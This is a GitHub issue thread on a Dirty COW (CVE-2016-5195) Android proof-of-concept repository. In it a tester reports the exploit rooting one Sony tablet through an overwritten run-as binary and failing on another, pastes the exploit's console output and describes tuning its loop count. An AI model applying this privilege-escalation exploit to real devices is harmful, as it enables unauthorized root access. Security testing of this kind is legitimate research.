search

timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
959 stars 395 forks source link

My test results #16

Closed kgretzky closed 7 years ago

kgretzky commented 8 years ago

I've so far tested the PoC on two devices:

Sony Xperia Z2 Tablet (rooted, running Cyanogenmod [11 i think]) - Android 4.4.4 : Status: Worked perfectly - overwritten run-as and was able to spawn root shell, meaning no SELinux was present.

[*] mmap 0xb6ee0000
[*] exploit (patch)
[*] currently 0xb6ee0000=464c457f
[*] madvise = 0xb6ee0000 9680
[*] madvise = 0 1048576
[*] /proc/self/mem 1560281088 1048576
[*] exploited 0xb6ee0000=464c457f

Sony Xperia Z5 Compact (stock firmware, non-rooted) - Android 6.0.1 : Status: Not working - run-as was not overwritten. Tried to increase the LOOP define from 0x100000 to 0x10000000 as I thought maybe it needs more time to trigger the run condition, but still after several minutes there was no success and run-as remained unchanged.

[*] mmap 0xf6fcd000
[*] exploit (patch)
[*] currently 0xf6fcd000=464c457f
[*] madvise = 0xf6fcd000 14192
[*] madvise = 0 268435456
[*] /proc/self/mem -268435456 268435456
[*] exploited 0xf6fcd000=464c457f

Will later check also on Samsung S5 and post the results here. Let me know if you need me to give you any more info.

timwr commented 7 years ago

Can you try make test? It could be the wrong architecture